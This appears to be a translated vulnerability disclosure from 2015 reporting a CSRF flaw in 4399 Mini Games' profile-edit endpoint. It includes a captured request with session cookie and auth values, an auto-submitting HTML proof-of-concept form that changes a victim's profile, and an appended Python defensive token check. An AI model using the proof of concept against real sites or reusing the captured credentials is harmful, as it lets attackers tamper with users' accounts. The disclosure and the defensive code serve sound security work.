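2015-07-20: Details reported to the vendor; awaiting vendor handling
2015-07-20: Vendor confirmed; details disclosed to the vendor only
2015-07-30: Details disclosed to core white hats and experts in related fields
2015-08-09: Details disclosed to regular white hats
2015-08-19: Details disclosed to intern white hats
2015-09-03: Details disclosed to the public
CSRF vulnerability in 4399 Mini Games allows modification of users' personal information
Log in, go to the personal center at http://u.4399.com/user/info, choose "Edit my information", and capture the request: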
POST /user/info/modify HTTP/1.1
Host: u.4399.com
Proxy-Connection: keep-alive
Content-Length: 143
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://u.4399.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://u.4399.com/user/info/modify
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: home4399=yes; USESSIONID=3f2bf9ec-bd89-4267-9c73-ac9a6c7a3f8b; ck_accname=1732343001; Puser=1732343001; Xauth=321dded1475d4658e6043b8f51783962; ptusertype=www_home.qq_login; Pnick=.ryga; Qnick= .; UC_sessionid=2015071905062098f13b01eb; Pauth=272418833|1732343001|t3ce7n18297df281f2db9a683eb29e7c|1437253627|10007|f230d9253ef40d6758bbebcd007794e7|0; Uauth=ext| .|2015719|www_home.#pay.|1437253627842|617983aa84e7438869ca16b865c414a4; _gprp_c=; Hm_lvt_e79fe6d54b06996ff433165b66607ec5=1437253581; Hm_lpvt_e79fe6d54b06996ff433165b66607ec5=1437254247

dosubmit=true&nick=wooyun.org&sex=1&bir_year=0&bir_month=0&bir_day=0&local_province=&local_city=&qq=&phone=&origo_province=&origo_city=&school=
As you can see, there is no token or similar verification, so let's test whether a CSRF attack can be carried out:
<html>
  <!-- o(∩_∩)o -->
  <body>
    <form action="http://u.4399.com/user/info/modify" method="POST">
      <input type="hidden" name="dosubmit" value="true" />
      <input type="hidden" name="nick" value="wooyun666" />
      <input type="hidden" name="sex" value="1" />
      <input type="hidden" name="bir_year" value="0" />
      <input type="hidden" name="bir_month" value="0" />
      <input type="hidden" name="bir_day" value="0" />
      <input type="hidden" name="local_province" value="" />
      <input type="hidden" name="local_city" value="" />
      <input type="hidden" name="qq" value="" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="origo_province" value="" />
      <input type="hidden" name="origo_city" value="" />
      <input type="hidden" name="school" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>document.forms[0].submit();</script>
</html>
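Open it to test.
The modification succeeds, and the other fields can be changed as well. If users are lured into clicking through messages or forum posts, and their usernames are then changed to a URL, a QQ number or the like for marketing, drive-by malware and so on, the harm is still considerable. CSRF is an awakened giant, after all o(∩_∩)o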
You are the professionals here.
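One way the missing check could be implemented on the server, as an added example that is not part of the original report or 4399's own code: an Origin allowlist plus an HMAC token bound to the session, run against the forged form body from the proof of concept. The `csrf_token` field name, `SECRET_KEY`, the session value, the nickname `alice` and `attacker.example` are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

SECRET_KEY = secrets.token_bytes(32)     # assumption: per-deployment server secret
TRUSTED_ORIGINS = {"http://u.4399.com"}  # Origin value seen in the captured request


def _mac(session_id, nonce):
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id):
    """Token the server would embed in the profile form, bound to the session."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def token_is_valid(session_id, token):
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    return hmac.compare_digest(mac.encode(), _mac(session_id, nonce).encode())


def allow_profile_update(headers, cookies, body):
    """Decide whether a POST to /user/info/modify may change the profile."""
    session_id = cookies.get("USESSIONID", "")
    if not session_id:
        return False, "no session"
    origin = headers.get("Origin")
    if origin is not None and origin not in TRUSTED_ORIGINS:
        return False, "cross-site origin"
    form = parse_qs(body, keep_blank_values=True)
    token = form.get("csrf_token", [""])[0]  # hypothetical hidden field name
    if not token_is_valid(session_id, token):
        return False, "missing or invalid csrf token"
    return True, "ok"


# Constructed sample data: placeholder session id, abbreviated form bodies.
SESSION = {"USESSIONID": "constructed-session-id"}
FORGED = "dosubmit=true&nick=wooyun666&sex=1"  # what the auto-submitting form sends
LEGIT = "dosubmit=true&nick=alice&sex=1&csrf_token=" + issue_csrf_token("constructed-session-id")

if __name__ == "__main__":
    print(allow_profile_update({"Origin": "http://attacker.example"}, SESSION, FORGED))
```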
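Severity: Low
Vulnerability Rank: 2
Confirmation time: 2015-07-20 16:25
Thank you for your attention. This issue has been handed over to the relevant department for handling.
None yet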